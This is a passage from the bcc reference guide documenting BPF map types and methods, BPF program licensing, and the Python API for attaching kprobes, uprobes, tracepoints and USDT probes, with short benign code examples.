<p>This creates a hash map with a map-in-map type (BPF_MAP_TYPE_HASH_OF_MAPS) map named <code>name</code> with <code>size</code> entries. The inner map meta data is provided by map <code>inner_map_name</code> and can be most of array or hash maps except <code>BPF_MAP_TYPE_PROG_ARRAY</code>, <code>BPF_MAP_TYPE_CGROUP_STORAGE</code> and <code>BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE</code>.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_ARRAY(ex1, int, 1024);
|
||
BPF_ARRAY(ex2, int, 1024);
|
||
BPF_HASH_OF_MAPS(maps_hash, struct custom_key, "ex1", 10);
|
||
</code></pre>
|
||
<h3 id="16-bpf_stack"><a class="header" href="#16-bpf_stack">16. BPF_STACK</a></h3>
|
||
<p>Syntax: <code>BPF_STACK(name, leaf_type, max_entries[, flags])</code></p>
|
||
<p>Creates a stack named <code>name</code> with value type <code>leaf_type</code> and max entries <code>max_entries</code>.
|
||
Stack and Queue maps are only available from Linux 4.20+.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_STACK(stack, struct event, 10240);
|
||
</code></pre>
|
||
<p>This creates a stack named <code>stack</code> where the value type is <code>struct event</code>, that holds up to 10240 entries.</p>
|
||
<p>Methods (covered later): map.push(), map.pop(), map.peek().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_STACK+path%3Atests&type=Code">search /tests</a>,</p>
|
||
<h3 id="17-bpf_queue"><a class="header" href="#17-bpf_queue">17. BPF_QUEUE</a></h3>
|
||
<p>Syntax: <code>BPF_QUEUE(name, leaf_type, max_entries[, flags])</code></p>
|
||
<p>Creates a queue named <code>name</code> with value type <code>leaf_type</code> and max entries <code>max_entries</code>.
|
||
Stack and Queue maps are only available from Linux 4.20+.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_QUEUE(queue, struct event, 10240);
|
||
</code></pre>
|
||
<p>This creates a queue named <code>queue</code> where the value type is <code>struct event</code>, that holds up to 10240 entries.</p>
|
||
<p>Methods (covered later): map.push(), map.pop(), map.peek().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_QUEUE+path%3Atests&type=Code">search /tests</a>,</p>
|
||
<h3 id="18-bpf_sockhash"><a class="header" href="#18-bpf_sockhash">18. BPF_SOCKHASH</a></h3>
|
||
<p>Syntax: <code>BPF_SOCKHASH(name[, key_type [, max_entries)</code></p>
|
||
<p>Creates a hash named <code>name</code>, with optional parameters. sockhash is only available from Linux 4.18+.</p>
|
||
<p>Default: <code>BPF_SOCKHASH(name, key_type=u32, max_entries=10240)</code></p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">struct sock_key {
|
||
u32 remote_ip4;
|
||
u32 local_ip4;
|
||
u32 remote_port;
|
||
u32 local_port;
|
||
};
|
||
BPF_HASH(skh, struct sock_key, 65535);
|
||
</code></pre>
|
||
<p>This creates a hash named <code>skh</code> where the key is a <code>struct sock_key</code>.</p>
|
||
<p>A sockhash is a BPF map type that holds references to sock structs. Then with a new sk/msg redirect bpf helper BPF programs can use the map to redirect skbs/msgs between sockets (<code>map.sk_redirect_hash()/map.msg_redirect_hash()</code>).</p>
|
||
<p>The difference between <code>BPF_SOCKHASH</code> and <code>BPF_SOCKMAP</code> is that <code>BPF_SOCKMAP</code> is implemented based on an array, and enforces keys to be four bytes. While <code>BPF_SOCKHASH</code> is implemented based on hash table, and the type of key can be specified freely.</p>
|
||
<p>Methods (covered later): map.sock_hash_update(), map.msg_redirect_hash(), map.sk_redirect_hash().</p>
|
||
<p><a href="https://github.com/iovisor/bcc/search?q=BPF_SOCKHASH+path%3Atests&type=Code">search /tests</a></p>
|
||
<h3 id="19-maplookup"><a class="header" href="#19-maplookup">19. map.lookup()</a></h3>
|
||
<p>Syntax: <code>*val map.lookup(&key)</code></p>
|
||
<p>Lookup the key in the map, and return a pointer to its value if it exists, else NULL. We pass the key in as an address to a pointer.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=lookup+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=lookup+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="20-maplookup_or_try_init"><a class="header" href="#20-maplookup_or_try_init">20. map.lookup_or_try_init()</a></h3>
|
||
<p>Syntax: <code>*val map.lookup_or_try_init(&key, &zero)</code></p>
|
||
<p>Lookup the key in the map, and return a pointer to its value if it exists, else initialize the key's value to the second argument. This is often used to initialize values to zero. If the key cannot be inserted (e.g. the map is full) then NULL is returned.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=lookup_or_try_init+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=lookup_or_try_init+path%3Atools&type=Code">search /tools</a></p>
|
||
<p>Note: The old map.lookup_or_init() may cause return from the function, so lookup_or_try_init() is recommended as it
|
||
does not have this side effect.</p>
|
||
<h3 id="21-mapdelete"><a class="header" href="#21-mapdelete">21. map.delete()</a></h3>
|
||
<p>Syntax: <code>map.delete(&key)</code></p>
|
||
<p>Delete the key from the hash.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=delete+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=delete+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="22-mapupdate"><a class="header" href="#22-mapupdate">22. map.update()</a></h3>
|
||
<p>Syntax: <code>map.update(&key, &val)</code></p>
|
||
<p>Associate the value in the second argument to the key, overwriting any previous value.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=update+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=update+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="23-mapinsert"><a class="header" href="#23-mapinsert">23. map.insert()</a></h3>
|
||
<p>Syntax: <code>map.insert(&key, &val)</code></p>
|
||
<p>Associate the value in the second argument to the key, only if there was no previous value.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=insert+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=insert+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="24-mapincrement"><a class="header" href="#24-mapincrement">24. map.increment()</a></h3>
|
||
<p>Syntax: <code>map.increment(key[, increment_amount])</code></p>
|
||
<p>Increments the key's value by <code>increment_amount</code>, which defaults to 1. Used for histograms.</p>
|
||
<p><code>map.increment()</code> are not atomic. In the concurrency case. If you want more accurate results, use <code>map.atomic_increment()</code> instead of <code>map.increment()</code>. The overhead of <code>map.increment()</code> and <code>map.atomic_increment()</code> is similar.</p>
|
||
<p>Note. When using <code>map.atomic_increment()</code> to operate on a BPF map of type <code>BPF_MAP_TYPE_HASH</code>, <code>map.atomic_increment()</code> does not guarantee the atomicity of the operation when the specified key does not exist.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=increment+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=increment+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="25-mapget_stackid"><a class="header" href="#25-mapget_stackid">25. map.get_stackid()</a></h3>
|
||
<p>Syntax: <code>int map.get_stackid(void *ctx, u64 flags)</code></p>
|
||
<p>This walks the stack found via the struct pt_regs in <code>ctx</code>, saves it in the stack trace map, and returns a unique ID for the stack trace.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=get_stackid+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=get_stackid+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="26-mapperf_read"><a class="header" href="#26-mapperf_read">26. map.perf_read()</a></h3>
|
||
<p>Syntax: <code>u64 map.perf_read(u32 cpu)</code></p>
|
||
<p>This returns the hardware performance counter as configured in <a href="bcc-documents/reference_guide.html#5-bpf_perf_array">5. BPF_PERF_ARRAY</a></p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=perf_read+path%3Atests&type=Code">search /tests</a></p>
|
||
<h3 id="27-mapcall"><a class="header" href="#27-mapcall">27. map.call()</a></h3>
|
||
<p>Syntax: <code>void map.call(void *ctx, int index)</code></p>
|
||
<p>This invokes <code>bpf_tail_call()</code> to tail-call the bpf program which the <code>index</code> entry in <a href="bcc-documents/reference_guide.html#10-bpf_prog_array">BPF_PROG_ARRAY</a> points to. A tail-call is different from the normal call. It reuses the current stack frame after jumping to another bpf program and never goes back. If the <code>index</code> entry is empty, it won't jump anywhere and the program execution continues as normal.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_PROG_ARRAY(prog_array, 10);
|
||
|
||
int tail_call(void *ctx) {
|
||
bpf_trace_printk("Tail-call\n");
|
||
return 0;
|
||
}
|
||
|
||
int do_tail_call(void *ctx) {
|
||
bpf_trace_printk("Original program\n");
|
||
prog_array.call(ctx, 2);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<pre><code class="language-Python">b = BPF(src_file="example.c")
|
||
tail_fn = b.load_func("tail_call", BPF.KPROBE)
|
||
prog_array = b.get_table("prog_array")
|
||
prog_array[c_int(2)] = c_int(tail_fn.fd)
|
||
b.attach_kprobe(event="some_kprobe_event", fn_name="do_tail_call")
|
||
</code></pre>
|
||
<p>This assigns <code>tail_call()</code> to <code>prog_array[2]</code>. In the end of <code>do_tail_call()</code>, <code>prog_array.call(ctx, 2)</code> tail-calls <code>tail_call()</code> and executes it.</p>
|
||
<p><strong>NOTE:</strong> To prevent infinite loop, the maximum number of tail-calls is 32 (<a href="https://github.com/torvalds/linux/search?l=C&q=MAX_TAIL_CALL_CNT+path%3Ainclude%2Flinux&type=Code"><code>MAX_TAIL_CALL_CNT</code></a>).</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?l=C&q=call+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?l=C&q=call+path%3Atests&type=Code">search /tests</a></p>
|
||
<h3 id="28-mapredirect_map"><a class="header" href="#28-mapredirect_map">28. map.redirect_map()</a></h3>
|
||
<p>Syntax: <code>int map.redirect_map(int index, int flags)</code></p>
|
||
<p>This redirects the incoming packets based on the <code>index</code> entry. If the map is <a href="bcc-documents/reference_guide.html#11-bpf_devmap">BPF_DEVMAP</a>, the packet will be sent to the transmit queue of the network interface that the entry points to. If the map is <a href="bcc-documents/reference_guide.html#12-bpf_cpumap">BPF_CPUMAP</a>, the packet will be sent to the ring buffer of the <code>index</code> CPU and be processed by the CPU later. If the map is <a href="bcc-documents/reference_guide.html#13-bpf_xskmap">BPF_XSKMAP</a>, the packet will be sent to the AF_XDP socket attached to the queue.</p>
|
||
<p>If the packet is redirected successfully, the function will return XDP_REDIRECT. Otherwise, it will return XDP_ABORTED to discard the packet.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_DEVMAP(devmap, 1);
|
||
|
||
int redirect_example(struct xdp_md *ctx) {
|
||
return devmap.redirect_map(0, 0);
|
||
}
|
||
int xdp_dummy(struct xdp_md *ctx) {
|
||
return XDP_PASS;
|
||
}
|
||
</code></pre>
|
||
<pre><code class="language-Python">ip = pyroute2.IPRoute()
|
||
idx = ip.link_lookup(ifname="eth1")[0]
|
||
|
||
b = bcc.BPF(src_file="example.c")
|
||
|
||
devmap = b.get_table("devmap")
|
||
devmap[c_uint32(0)] = c_int(idx)
|
||
|
||
in_fn = b.load_func("redirect_example", BPF.XDP)
|
||
out_fn = b.load_func("xdp_dummy", BPF.XDP)
|
||
b.attach_xdp("eth0", in_fn, 0)
|
||
b.attach_xdp("eth1", out_fn, 0)
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?l=C&q=redirect_map+path%3Aexamples&type=Code">search /examples</a>,</p>
|
||
<h3 id="29-mappush"><a class="header" href="#29-mappush">29. map.push()</a></h3>
|
||
<p>Syntax: <code>int map.push(&val, int flags)</code></p>
|
||
<p>Push an element onto a Stack or Queue table.
|
||
Passing BPF_EXIST as a flag causes the Queue or Stack to discard the oldest element if it is full.
|
||
Returns 0 on success, negative error on failure.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=push+path%3Atests&type=Code">search /tests</a>,</p>
|
||
<h3 id="30-mappop"><a class="header" href="#30-mappop">30. map.pop()</a></h3>
|
||
<p>Syntax: <code>int map.pop(&val)</code></p>
|
||
<p>Pop an element from a Stack or Queue table. <code>*val</code> is populated with the result.
|
||
Unlike peeking, popping removes the element.
|
||
Returns 0 on success, negative error on failure.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=pop+path%3Atests&type=Code">search /tests</a>,</p>
|
||
<h3 id="31-mappeek"><a class="header" href="#31-mappeek">31. map.peek()</a></h3>
|
||
<p>Syntax: <code>int map.peek(&val)</code></p>
|
||
<p>Peek an element at the head of a Stack or Queue table. <code>*val</code> is populated with the result.
|
||
Unlike popping, peeking does not remove the element.
|
||
Returns 0 on success, negative error on failure.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=peek+path%3Atests&type=Code">search /tests</a>,</p>
|
||
<h3 id="32-mapsock_hash_update"><a class="header" href="#32-mapsock_hash_update">32. map.sock_hash_update()</a></h3>
|
||
<p>Syntax: <code>int map.sock_hash_update(struct bpf_sock_ops *skops, &key, int flags)</code></p>
|
||
<p>Add an entry to, or update a sockhash map referencing sockets. The skops is used as a new value for the entry associated to key. flags is one of:</p>
|
||
<pre><code class="language-sh">BPF_NOEXIST: The entry for key must not exist in the map.
|
||
BPF_EXIST: The entry for key must already exist in the map.
|
||
BPF_ANY: No condition on the existence of the entry for key.
|
||
</code></pre>
|
||
<p>If the map has eBPF programs (parser and verdict), those will be inherited by the socket being added. If the socket is already attached to eBPF programs, this results in an error.</p>
|
||
<p>Return 0 on success, or a negative error in case of failure.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=sock_hash_update+path%3Atests&type=Code">search /tests</a>,</p>
|
||
<h3 id="33-mapmsg_redirect_hash"><a class="header" href="#33-mapmsg_redirect_hash">33. map.msg_redirect_hash()</a></h3>
|
||
<p>Syntax: <code>int map.msg_redirect_hash(struct sk_msg_buff *msg, void *key, u64 flags)</code></p>
|
||
<p>This helper is used in programs implementing policies at the socket level. If the message msg is allowed to pass (i.e. if the verdict eBPF program returns SK_PASS), redirect it to the socket referenced by map (of type BPF_MAP_TYPE_SOCKHASH) using hash key. Both ingress and egress interfaces can be used for redirection. The BPF_F_INGRESS value in flags is used to make the distinction (ingress path is selected if the flag is present, egress path otherwise). This is the only flag supported for now.</p>
|
||
<p>Return SK_PASS on success, or SK_DROP on error.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=msg_redirect_hash+path%3Atests&type=Code">search /tests</a>,</p>
|
||
<h3 id="34-mapsk_redirect_hash"><a class="header" href="#34-mapsk_redirect_hash">34. map.sk_redirect_hash()</a></h3>
|
||
<p>Syntax: <code>int map.sk_redirect_hash(struct sk_buff *skb, void *key, u64 flags)</code></p>
|
||
<p>This helper is used in programs implementing policies at the skb socket level. If the sk_buff skb is allowed to pass (i.e. if the verdict eBPF program returns SK_PASS), redirect it to the socket referenced by map (of type BPF_MAP_TYPE_SOCKHASH) using hash key. Both ingress and egress interfaces can be used for redirection. The BPF_F_INGRESS value in flags is used to make the distinction (ingress path is selected if the flag is present, egress otherwise). This is the only flag supported for now.</p>
|
||
<p>Return SK_PASS on success, or SK_DROP on error.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=sk_redirect_hash+path%3Atests&type=Code">search /tests</a>,</p>
|
||
<h2 id="licensing"><a class="header" href="#licensing">Licensing</a></h2>
|
||
<p>Depending on which <a href="bcc-documents/kernel-versions.html#helpers">BPF helpers</a> are used, a GPL-compatible license is required.</p>
|
||
<p>The special BCC macro <code>BPF_LICENSE</code> specifies the license of the BPF program. You can set the license as a comment in your source code, but the kernel has a special interface to specify it programmatically. If you need to use GPL-only helpers, it is recommended to specify the macro in your C code so that the kernel can understand it:</p>
|
||
<pre><code class="language-C">// SPDX-License-Identifier: GPL-2.0+
|
||
#define BPF_LICENSE GPL
|
||
</code></pre>
|
||
<p>Otherwise, the kernel may reject loading your program (see the <a href="bcc-documents/reference_guide.html#2-cannot-call-gpl-only-function-from-proprietary-program">error description</a> below). Note that it supports multiple words and quotes are not necessary:</p>
|
||
<pre><code class="language-C">// SPDX-License-Identifier: GPL-2.0+ OR BSD-2-Clause
|
||
#define BPF_LICENSE Dual BSD/GPL
|
||
</code></pre>
|
||
<p>Check the <a href="bcc-documents/kernel-versions.html#helpers">BPF helpers reference</a> to see which helpers are GPL-only and what the kernel understands as GPL-compatible.</p>
|
||
<p><strong>If the macro is not specified, BCC will automatically define the license of the program as GPL.</strong></p>
|
||
<h2 id="rewriter"><a class="header" href="#rewriter">Rewriter</a></h2>
|
||
<p>One of jobs for rewriter is to turn implicit memory accesses to explicit ones using kernel helpers. Recent kernel introduced a config option ARCH_HAS_NON_OVERLAPPING_ADDRESS_SPACE which will be set for architectures who user address space and kernel address are disjoint. x86 and arm has this config option set while s390 does not. If ARCH_HAS_NON_OVERLAPPING_ADDRESS_SPACE is not set, the bpf old helper <code>bpf_probe_read()</code> will not be available. Some existing users may have implicit memory accesses to access user memory, so using <code>bpf_probe_read_kernel()</code> will cause their application to fail. Therefore, for non-s390, the rewriter will use <code>bpf_probe_read()</code> for these implicit memory accesses. For s390, <code>bpf_probe_read_kernel()</code> is used as default and users should use <code>bpf_probe_read_user()</code> explicitly when accessing user memories.</p>
|
||
<h1 id="bcc-python"><a class="header" href="#bcc-python">bcc Python</a></h1>
|
||
<h2 id="initialization"><a class="header" href="#initialization">Initialization</a></h2>
|
||
<p>Constructors.</p>
|
||
<h3 id="1-bpf"><a class="header" href="#1-bpf">1. BPF</a></h3>
|
||
<p>Syntax: <code>BPF({text=BPF_program | src_file=filename} [, usdt_contexts=[USDT_object, ...]] [, cflags=[arg1, ...]] [, debug=int])</code></p>
|
||
<p>Creates a BPF object. This is the main object for defining a BPF program, and interacting with its output.</p>
|
||
<p>Exactly one of <code>text</code> or <code>src_file</code> must be supplied (not both).</p>
|
||
<p>The <code>cflags</code> specifies additional arguments to be passed to the compiler, for example <code>-DMACRO_NAME=value</code> or <code>-I/include/path</code>. The arguments are passed as an array, with each element being an additional argument. Note that strings are not split on whitespace, so each argument must be a different element of the array, e.g. <code>["-include", "header.h"]</code>.</p>
|
||
<p>The <code>debug</code> flags control debug output, and can be or'ed together:</p>
|
||
<ul>
|
||
<li><code>DEBUG_LLVM_IR = 0x1</code> compiled LLVM IR</li>
|
||
<li><code>DEBUG_BPF = 0x2</code> loaded BPF bytecode and register state on branches</li>
|
||
<li><code>DEBUG_PREPROCESSOR = 0x4</code> pre-processor result</li>
|
||
<li><code>DEBUG_SOURCE = 0x8</code> ASM instructions embedded with source</li>
|
||
<li><code>DEBUG_BPF_REGISTER_STATE = 0x10</code> register state on all instructions in addition to DEBUG_BPF</li>
|
||
<li><code>DEBUG_BTF = 0x20</code> print the messages from the <code>libbpf</code> library.</li>
|
||
</ul>
|
||
<p>Examples:</p>
|
||
<pre><code class="language-Python"># define entire BPF program in one line:
|
||
BPF(text='int do_trace(void *ctx) { bpf_trace_printk("hit!\\n"); return 0; }');
|
||
|
||
# define program as a variable:
|
||
prog = """
|
||
int hello(void *ctx) {
|
||
bpf_trace_printk("Hello, World!\\n");
|
||
return 0;
|
||
}
|
||
"""
|
||
b = BPF(text=prog)
|
||
|
||
# source a file:
|
||
b = BPF(src_file = "vfsreadlat.c")
|
||
|
||
# include a USDT object:
|
||
u = USDT(pid=int(pid))
|
||
[...]
|
||
b = BPF(text=bpf_text, usdt_contexts=[u])
|
||
|
||
# add include paths:
|
||
u = BPF(text=prog, cflags=["-I/path/to/include"])
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="2-usdt"><a class="header" href="#2-usdt">2. USDT</a></h3>
|
||
<p>Syntax: <code>USDT({pid=pid | path=path})</code></p>
|
||
<p>Creates an object to instrument User Statically-Defined Tracing (USDT) probes. Its primary method is <code>enable_probe()</code>.</p>
|
||
<p>Arguments:</p>
|
||
<ul>
|
||
<li>pid: attach to this process ID.</li>
|
||
<li>path: instrument USDT probes from this binary path.</li>
|
||
</ul>
|
||
<p>Examples:</p>
|
||
<pre><code class="language-Python"># include a USDT object:
|
||
u = USDT(pid=int(pid))
|
||
[...]
|
||
b = BPF(text=bpf_text, usdt_contexts=[u])
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=USDT+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=USDT+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h2 id="events"><a class="header" href="#events">Events</a></h2>
|
||
<h3 id="1-attach_kprobe"><a class="header" href="#1-attach_kprobe">1. attach_kprobe()</a></h3>
|
||
<p>Syntax: <code>BPF.attach_kprobe(event="event", fn_name="name")</code></p>
|
||
<p>Instruments the kernel function <code>event()</code> using kernel dynamic tracing of the function entry, and attaches our C defined function <code>name()</code> to be called when the kernel function is called.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.attach_kprobe(event="sys_clone", fn_name="do_trace")
|
||
</code></pre>
|
||
<p>This will instrument the kernel <code>sys_clone()</code> function, which will then run our BPF defined <code>do_trace()</code> function each time it is called.</p>
|
||
<p>You can call attach_kprobe() more than once, and attach your BPF function to multiple kernel functions.
|
||
You can also call attach_kprobe() more than once to attach multiple BPF functions to the same kernel function.</p>
|
||
<p>See the previous kprobes section for how to instrument arguments from BPF.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_kprobe+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_kprobe+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="2-attach_kretprobe"><a class="header" href="#2-attach_kretprobe">2. attach_kretprobe()</a></h3>
|
||
<p>Syntax: <code>BPF.attach_kretprobe(event="event", fn_name="name" [, maxactive=int])</code></p>
|
||
<p>Instruments the return of the kernel function <code>event()</code> using kernel dynamic tracing of the function return, and attaches our C defined function <code>name()</code> to be called when the kernel function returns.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.attach_kretprobe(event="vfs_read", fn_name="do_return")
|
||
</code></pre>
|
||
<p>This will instrument the kernel <code>vfs_read()</code> function, which will then run our BPF defined <code>do_return()</code> function each time it is called.</p>
|
||
<p>You can call attach_kretprobe() more than once, and attach your BPF function to multiple kernel function returns.
|
||
You can also call attach_kretprobe() more than once to attach multiple BPF functions to the same kernel function return.</p>
|
||
<p>When a kretprobe is installed on a kernel function, there is a limit on how many parallel calls it can catch. You can change that limit with <code>maxactive</code>. See the kprobes documentation for its default value.</p>
|
||
<p>See the previous kretprobes section for how to instrument the return value from BPF.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_kretprobe+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_kretprobe+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="3-attach_tracepoint"><a class="header" href="#3-attach_tracepoint">3. attach_tracepoint()</a></h3>
|
||
<p>Syntax: <code>BPF.attach_tracepoint(tp="tracepoint", fn_name="name")</code></p>
|
||
<p>Instruments the kernel tracepoint described by <code>tracepoint</code>, and when hit, runs the BPF function <code>name()</code>.</p>
|
||
<p>This is an explicit way to instrument tracepoints. The <code>TRACEPOINT_PROBE</code> syntax, covered in the earlier tracepoints section, is an alternate method with the advantage of auto-declaring an <code>args</code> struct containing the tracepoint arguments. With <code>attach_tracepoint()</code>, the tracepoint arguments need to be declared in the BPF program.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python"># define BPF program
|
||
bpf_text = """
|
||
#include <uapi/linux/ptrace.h>
|
||
|
||
struct urandom_read_args {
|
||
// from /sys/kernel/debug/tracing/events/random/urandom_read/format
|
||
u64 __unused__;
|
||
u32 got_bits;
|
||
u32 pool_left;
|
||
u32 input_left;
|
||
};
|
||
|
||
int printarg(struct urandom_read_args *args) {
|
||
bpf_trace_printk("%d\\n", args->got_bits);
|
||
return 0;
|
||
};
|
||
"""
|
||
|
||
# load BPF program
|
||
b = BPF(text=bpf_text)
|
||
b.attach_tracepoint("random:urandom_read", "printarg")
|
||
</code></pre>
|
||
<p>Notice how the first argument to <code>printarg()</code> is now our defined struct.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/blob/a4159da8c4ea8a05a3c6e402451f530d6e5a8b41/examples/tracing/urandomread-explicit.py#L41">code</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_tracepoint+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_tracepoint+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="4-attach_uprobe"><a class="header" href="#4-attach_uprobe">4. attach_uprobe()</a></h3>
|
||
<p>Syntax: <code>BPF.attach_uprobe(name="location", sym="symbol", fn_name="name" [, sym_off=int])</code>, <code>BPF.attach_uprobe(name="location", sym_re="regex", fn_name="name")</code>, <code>BPF.attach_uprobe(name="location", addr=int, fn_name="name")</code></p>
|
||
<p>Instruments the user-level function <code>symbol()</code> from either the library or binary named by <code>location</code> using user-level dynamic tracing of the function entry, and attach our C defined function <code>name()</code> to be called whenever the user-level function is called. If <code>sym_off</code> is given, the function is attached to the offset within the symbol.</p>
|
||
<p>The real address <code>addr</code> may be supplied in place of <code>sym</code>, in which case <code>sym</code> must be set to its default value. If the file is a non-PIE executable, <code>addr</code> must be a virtual address, otherwise it must be an offset relative to the file load address.</p>
|
||
<p>Instead of a symbol name, a regular expression can be provided in <code>sym_re</code>. The uprobe will then attach to symbols that match the provided regular expression.</p>
|
||
<p>Libraries can be given in the name argument without the lib prefix, or with the full path (/usr/lib/...). Binaries can be given only with the full path (/bin/sh).</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.attach_uprobe(name="c", sym="strlen", fn_name="count")
|
||
</code></pre>
|
||
<p>This will instrument <code>strlen()</code> function from libc, and call our BPF function <code>count()</code> when it is called. Note how the "lib" in "libc" is not necessary to specify.</p>
|
||
<p>Other examples:</p>
|
||
<pre><code class="language-Python">b.attach_uprobe(name="c", sym="getaddrinfo", fn_name="do_entry")
|
||
b.attach_uprobe(name="/usr/bin/python", sym="main", fn_name="do_main")
|
||
</code></pre>
|
||
<p>You can call attach_uprobe() more than once, and attach your BPF function to multiple user-level functions.</p>
|
||
<p>See the previous uprobes section for how to instrument arguments from BPF.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_uprobe+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_uprobe+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="5-attach_uretprobe"><a class="header" href="#5-attach_uretprobe">5. attach_uretprobe()</a></h3>
|
||
<p>Syntax: <code>BPF.attach_uretprobe(name="location", sym="symbol", fn_name="name")</code></p>
|
||
<p>Instruments the return of the user-level function <code>symbol()</code> from either the library or binary named by <code>location</code> using user-level dynamic tracing of the function return, and attach our C defined function <code>name()</code> to be called whenever the user-level function returns.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.attach_uretprobe(name="c", sym="strlen", fn_name="count")
|
||
</code></pre>
|
||
<p>This will instrument <code>strlen()</code> function from libc, and call our BPF function <code>count()</code> when it returns.</p>
|
||
<p>Other examples:</p>
|
||
<pre><code class="language-Python">b.attach_uretprobe(name="c", sym="getaddrinfo", fn_name="do_return")
|
||
b.attach_uretprobe(name="/usr/bin/python", sym="main", fn_name="do_main")
|
||
</code></pre>
|
||
<p>You can call attach_uretprobe() more than once, and attach your BPF function to multiple user-level functions.</p>
|
||
<p>See the previous uretprobes section for how to instrument the return value from BPF.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_uretprobe+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_uretprobe+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="6-usdtenable_probe"><a class="header" href="#6-usdtenable_probe">6. USDT.enable_probe()</a></h3>
|
||
<p>Syntax: <code>USDT.enable_probe(probe=probe, fn_name=name)</code></p>
|
||
<p>Attaches a BPF C function <code>name</code> to the USDT probe <code>probe</code>.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># enable USDT probe from given PID
|
||
u = USDT(pid=int(pid))
|
||
u.enable_probe(probe="http__server__request", fn_name="do_trace")
|
||
</code></pre>
|
||
